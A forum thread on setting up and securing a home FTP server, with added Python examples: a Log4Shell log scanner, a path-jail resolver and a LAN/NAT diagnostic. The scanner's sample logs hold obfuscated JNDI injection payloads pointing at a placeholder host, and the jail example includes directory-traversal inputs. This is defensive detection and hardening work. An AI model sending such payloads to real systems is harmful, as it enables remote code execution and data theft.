Desperately trying to set up an FTP server

MrSoftware

Joined Oct 29, 2013
2,273
There are multiple aspects to look at. You're looking at the first, which is proper server configuration, i.e., how to configure the server such that users can only do what you want them to do (jailed in their own directory), and what options to use to keep logins and data secure (MFA, SFTP encryption required, VPN required, IP address limits, each user's directory individually encrypted with different keys, etc., whatever is appropriate for your situation). Also the machine must be monitored to be sure every piece of software is kept up to date and security vulnerabilities are patched quickly. Additionally you must ask what happens when the bad guy realizes that a specifically crafted command, executed remotely, breaks the server in a way that gives them an administrator-level shell into the system? Once inside, what can they access? What other machines on the network could be vulnerable? If the bad guy erases everything or executes ransomware, are your backups good enough, and will the downtime kill your business? Questions like this. For a recent example, check out the log4j vulnerability that set the security world on fire for a bit. Scroll down to "How the Log4Shell vulnerability works"; hopefully I got this link right:

How the Log4Shell vulnerability works

Software today relies on so many open source and shared libraries that often one vulnerability in one library can affect a great number of machines (such as log4j), and the bad guys quickly automate attacks and then sell automated attack tools as commodities. Ransomware is perhaps the most prevalent example of commoditized malware today. The people doing the attacks no longer have to be hacker experts; they just buy the tools and follow the instructions to use them. The cost of the tool is the price of doing business. For this reason, if you're going to be handling super sensitive data, it may be worth looking into a company that specializes in selling secure file sharing services. You pay them a fee, they give you a site that you configure how you want, and they handle all the dirty work on the back end. One example of this would be Google Drive or Microsoft OneDrive. You pay them a fee, they give you storage space, and they handle all of the server-side work. I believe there may even be FTP access available for both of these. I'm not sure if one of these fits your needs, there are others, but it's an example of hiring someone to handle the back end for you.
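The post above points at Log4Shell as the textbook case of "one crafted string, executed remotely, becomes a shell". The detector below is an added example, not code from the thread or from the linked article: it runs over a few constructed Apache-style access-log lines (the 198.51.100.x / 203.0.113.9 addresses are documentation ranges, not real traffic) and looks for a `${jndi:...}` lookup after undoing the obfuscations attackers used to slip past naive string matching (`${lower:j}`, `${upper:...}`, `${::-j}`, `${env:NOPE:-j}` and URL encoding). It is a heuristic in Python, not a reimplementation of Log4j's lookup engine.

```python
import re
from urllib.parse import unquote

# An innermost ${...} lookup: its body contains no further '$', '{' or '}'.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# What we are ultimately looking for once the obfuscation is folded away.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _fold_lookup(body: str):
    """Return what Log4j 2 would substitute for one innermost lookup, for the
    obfuscation tricks that were common in the wild, or None if it is not one of
    those (the real ${jndi:...} lookup, or something harmless like ${date:...})."""
    lowered = body.lower()
    if lowered.startswith("lower:"):
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # ${env:NOSUCHVAR:-j} and ${::-j}: an undefined key falls back to the text after ':-'.
        return body.split(":-", 1)[1]
    return None


def normalize(text: str, max_rounds: int = 32) -> str:
    """Undo one layer of URL encoding, then fold innermost lookups from the inside
    out until nothing changes. max_rounds bounds the work on hostile input."""
    s = unquote(text)
    for _ in range(max_rounds):
        changed = False

        def fold(m):
            nonlocal changed
            replacement = _fold_lookup(m.group(1))
            if replacement is None:
                return m.group(0)
            changed = True
            return replacement

        s = INNERMOST.sub(fold, s)
        if not changed:
            break
    return s


def is_jndi_probe(line: str) -> bool:
    """True if the line carries a (possibly obfuscated) ${jndi:...} lookup."""
    return JNDI_LOOKUP.search(normalize(line)) is not None


def scan(lines):
    """Return (index, normalized_line) for every line that carries a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        norm = normalize(line)
        if JNDI_LOOKUP.search(norm):
            hits.append((i, norm))
    return hits


# Constructed sample log lines for the example (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:01:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:12:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '198.51.100.7 - - [10/Dec/2021:12:01:03 +0000] "GET /?x=${${lower:j}ndi:rmi://203.0.113.9/x} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.8 - - [10/Dec/2021:12:01:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.9/z}"',
    '198.51.100.9 - - [10/Dec/2021:12:01:05 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%2Fa%7D HTTP/1.1" 200 12 "-" "-"',
    '10.0.0.6 - - [10/Dec/2021:12:01:06 +0000] "GET /report?when=${date:yyyy} HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for idx, norm in scan(SAMPLE_LOG):
        print(f"line {idx}: {norm}")
```

The point of folding from the inside out is that every published bypass nests a cheap lookup inside the dangerous one; after folding, a single case-insensitive match on `${jndi:` catches them all, while a plain `grep jndi` misses three of the four malicious lines above. Only one layer of URL decoding is applied, so double-encoded payloads would need another pass.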
 

Hallander

Joined Apr 23, 2022
1
Glad to hear it worked!

My recommendation when deployed on a live release is to get a static IP from your ISP and whitelist the related server IPs in your VPC or hosting environment. This is good practice to avoid POD attacks.

Keep up the good work!
best regards.
aka AlvaroG.
 

Thread Starter

cmartinez

Joined Jan 17, 2007
8,789
Thanks, MS, for the explanation. After reading your post, I went and immediately disabled the server's capability of handling HTTP requests, and I also disabled its ability to run scripts.
 

Ya’akov

Joined Jan 27, 2019
10,262
cmartinez wrote:
I DID IT!!!! ... I stupidly turned my firewalls on and off for a brief moment, to see if that would change the situation, to no avail. But by doing that I inadvertently reset their settings. And that forced me to go through the inbound/outbound rules again, and I also manually added the CompleteFTP server software to the list of programs (which I hadn't done before, because it was already (partially) working) ... and voilà! We're online.

Yaakov, please test the connection with the parameters I gave you in my PM, if you can.
Hey, @cmartinez I just saw this. Do you still need help?

As far as vulnerabilities, while it should be the case that the FTP server code prevents access outside the configured directories, there can be flaws in software designs that can be exploited. For example, this is for an older version (I assume) of the server you are using. People are always finding ways to make software do things it wasn't intended to do.

In general there is an infosec rule: "what you call a service the bad guys call an opportunity". Every port you open to the world increases the "attack surface" for the bad guys, and every well-known port will see scripts trying to use known exploits to gain control of your machine.

Keep your software up to date, check software for vulns here. You need to be vigilant, if the server software publisher offers a security mailing list, get on it.
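Both MrSoftware's "jailed in their own directory" and Ya'akov's remark that the server code should, but may not, prevent access outside the configured directories come down to one routine: how a client-supplied path is mapped onto the real filesystem. The snippet below is an added example in Python, not code from CompleteFTP or from the thread; the jail root `/srv/ftp/alice` and the file names are constructed. It shows the flawed join beside a hardened resolver, plus the on-disk symlink check that a lexical resolver cannot do on its own.

```python
import os
import posixpath


class JailEscape(ValueError):
    """Raised when a client path cannot be mapped to a location inside the user's jail."""


def naive_join(jail_root: str, requested: str) -> str:
    """The flawed pattern: glue the jail root and the client's path together and normalise.
    normpath() folds '..' components, so '/../bob/secret' walks straight out of alice's jail."""
    return posixpath.normpath(jail_root.rstrip("/") + "/" + requested.lstrip("/"))


def resolve_in_jail(jail_root: str, cwd: str, requested: str) -> str:
    """Map a client-supplied FTP path onto a server path that stays under jail_root.

    jail_root: absolute server-side directory for this user (POSIX style in this example)
    cwd:       the user's current directory *as the user sees it*; '/' is the jail root
    requested: the raw argument of CWD/RETR/STOR/... (absolute or relative)

    The trick is to normalise in the user's virtual namespace first, where '/' is the
    jail root and any surplus '..' simply collapses to '/', and only then prepend jail_root.
    """
    if "\x00" in requested:
        raise JailEscape("NUL byte in path")
    p = requested.replace("\\", "/")          # a Windows-hosted server may accept backslashes too
    if not p.startswith("/"):
        p = posixpath.join(cwd, p)
    virtual = posixpath.normpath("/" + p.lstrip("/"))
    real = posixpath.normpath(jail_root.rstrip("/") + virtual)
    # Belt and braces: the resolved path must still have the jail root as its prefix.
    root = posixpath.normpath(jail_root)
    if posixpath.commonpath([root, real]) != root:
        raise JailEscape(f"{requested!r} resolves outside {root}")
    return real


def is_safe_request(jail_root: str, cwd: str, requested: str) -> bool:
    """Convenience wrapper: True if the request maps inside the jail."""
    try:
        resolve_in_jail(jail_root, cwd, requested)
        return True
    except JailEscape:
        return False


def verify_on_disk(jail_root: str, server_path: str) -> str:
    """Lexical checks cannot see symlinks. Before touching the file, resolve symlinks on
    the real filesystem and check the prefix again; returns the canonical path."""
    root = os.path.realpath(jail_root)
    target = os.path.realpath(server_path)
    if os.path.commonpath([root, target]) != root:
        raise JailEscape(f"{server_path} escapes {root} via symlink")
    return target


if __name__ == "__main__":
    print("flawed :", naive_join("/srv/ftp/alice", "/../bob/secret.txt"))
    print("jailed :", resolve_in_jail("/srv/ftp/alice", "/", "/../bob/secret.txt"))
    print("jailed :", resolve_in_jail("/srv/ftp/alice", "/docs", "../../../etc/passwd"))
```

Run it and the flawed join hands back `/srv/ftp/bob/secret.txt` for a request that alice should never see, while the jailed resolver turns the same request into `/srv/ftp/alice/bob/secret.txt` (a harmless miss inside her own tree). `verify_on_disk` is the part people forget: a symlink that a user managed to create inside the jail, or that an admin dropped there, defeats every string check, so the real path must be re-checked after `realpath()`.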
 

Thread Starter

cmartinez

Joined Jan 17, 2007
8,789
Hello, I'm back. My server has been running smoothly and without a hitch all this time. I can easily access it using the FileZilla client or the free and easy to use AndFTP smartphone app.

I have one question, however. If I try to access the server from within my own network (LAN) I get an error message saying that the server can't be found. The server must be accessed from outside the LAN or otherwise it won't work. For example, if I try to access it from my phone (or laptop) through my WiFi network I'll get an error message. But if I disconnect the phone from the WiFi AP and use mobile data (GPRS) instead, then everything will work fine. Why's that?
 

Ya’akov

Joined Jan 27, 2019
10,262
This depends on your configuration and how you are trying to access the server. The server's address outside will not be the same as its address on the LAN. If you try to access it by a name you might be seeing a "split horizon" DNS response, where the name resolves to a LAN address if you are on the LAN, not the outside address. If your server is not bound to ports 21 and 20 on its LAN interface, you won't be able to access it from the LAN.
 

Thread Starter

cmartinez

Joined Jan 17, 2007
8,789
The client does identify the server's outside IP address. I know that because I can see the script as it runs in real time. But I hadn't considered the way the ports are accessed through the LAN ... I'm gonna check it out and see if that's what's going on.

Thanks for your help. It's always thoroughly appreciated.
 

Thread Starter

cmartinez

Joined Jan 17, 2007
8,789
So I went through my modem's settings, and port forwarding is configured as follows:

[attached screenshot 1736263417356.png: the modem's port-forwarding rules]

Both WAN and LAN ports are correctly configured to point to the computer where the server software is installed. So, no. I don't think that's it.

I wonder if it has something to do with the way the Server Software itself is configured.
 

Thread Starter

cmartinez

Joined Jan 17, 2007
8,789
Please clarify something: if you attempt to connect to 192.196.1.100 with the FTP client, it fails?
No. If I try to connect from the outside (not within the LAN) to the domain that my computer is addressed at (xxxx.net) then the client will find the server and everything will work fine. But if I try to do the same thing from within the LAN, then the client will also find the server, but it won't be able to connect.
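The last few posts describe a name that resolves to the public address, a forwarding rule that works from outside, and a client on the LAN that finds the server but cannot connect. The script below is an added diagnostic, not part of the thread and not CompleteFTP's code: run from a client inside the LAN, it probes the control port both the way the hostname resolves (public address, through the router) and directly via the LAN address, and names the likely cause, covering Ya'akov's split-horizon and binding cases as well as a router without NAT loopback (hairpin NAT). It also goes one step beyond the control connection and checks the address a server advertises in its PASV reply, which is the other place an FTP session breaks depending on which side of the router the client sits. `203.0.113.10` and `192.168.1.100` are constructed placeholders; substitute your own.

```python
import ipaddress
import re
import socket

# Constructed addresses for the example: a public address from a documentation range
# and a typical RFC 1918 LAN address. Substitute your own.
PUBLIC_IP = "203.0.113.10"
SERVER_LAN_IP = "192.168.1.100"

PASV_RE = re.compile(r"\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)")


def tcp_probe(host: str, port: int, timeout: float = 3.0) -> bool:
    """True if a TCP handshake to host:port completes: the bare 'can it connect' test."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def diagnose_from_lan(public_ip: str, server_lan_ip: str, port: int = 21, probe=tcp_probe) -> str:
    """Run on a client INSIDE the LAN. Tries the control port the way a hostname resolves
    (public address, via the router) and directly (LAN address), then names the likely cause.
    The token before the colon is stable for scripting; the rest is for humans."""
    via_public = probe(public_ip, port)
    via_lan = probe(server_lan_ip, port)
    if via_public and via_lan:
        return "ok: the router hairpins (NAT loopback), so the public name works from inside too"
    if via_lan and not via_public:
        return ("nat-loopback-missing: the server is fine, but the router will not forward LAN traffic "
                "sent to its own public address; use split-horizon DNS or the LAN address from inside")
    if via_public and not via_lan:
        return ("lan-path-blocked: reachable only via the router; check the host firewall rule's remote "
                "address scope and which interface the server is bound to")
    return "not-listening: nothing answers on the port; check the service, its binding and the host firewall"


def parse_pasv(reply: str):
    """Parse '227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)' into (ip, port)."""
    m = PASV_RE.search(reply)
    if not reply.startswith("227") or not m:
        raise ValueError(f"not a PASV reply: {reply!r}")
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def check_pasv_address(reply: str, client_on_lan: bool, server_lan_ip: str, server_public_ip: str) -> str:
    """A successful control connection is only half of FTP: in passive mode the data connection
    goes to whatever address the server advertises. Classify that address for the client's
    position. (Some clients, FileZilla among them, replace an unroutable PASV address with the
    control connection's peer; this check assumes a client that obeys the reply as sent.)"""
    ip, port = parse_pasv(reply)
    if client_on_lan:
        if ip == server_lan_ip:
            return f"ok: data connection to {ip}:{port} stays on the LAN"
        if ip == server_public_ip:
            return f"hairpin-needed: data connection to {ip}:{port} goes back out through the router"
    else:
        if ip == server_public_ip:
            return f"ok: data connection to {ip}:{port} (the passive port range must be forwarded too)"
        if ipaddress.ip_address(ip).is_private:
            return f"unreachable: server advertised private address {ip} to an outside client; set its external address"
    return f"mismatch: advertised {ip}:{port} is neither the LAN nor the public address"


if __name__ == "__main__":
    # Offline demo: a fake probe where only the LAN address answers, the classic
    # symptom of a router without NAT loopback. For the real thing, from a LAN client,
    # call diagnose_from_lan(PUBLIC_IP, SERVER_LAN_IP) with the default probe.
    fake = lambda host, port: (host, port) == (SERVER_LAN_IP, 21)
    print(diagnose_from_lan(PUBLIC_IP, SERVER_LAN_IP, probe=fake))
    print(check_pasv_address("227 Entering Passive Mode (203,0,113,10,195,80).", True, SERVER_LAN_IP, PUBLIC_IP))
```

If the LAN address answers and the public one does not, the server and the forwarding rule are not the problem; the router simply does not loop LAN traffic back through its own WAN address, and the fix is either a split-horizon DNS entry (or a hosts-file entry on the LAN clients) pointing the name at the LAN address, or a modem that supports NAT loopback. The PASV check matters for the case where the control connection succeeds and the transfer then hangs or fails: from inside, a public address in the 227 reply needs the same hairpin, and from outside, a private address in the reply means the server was never told its external address.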
 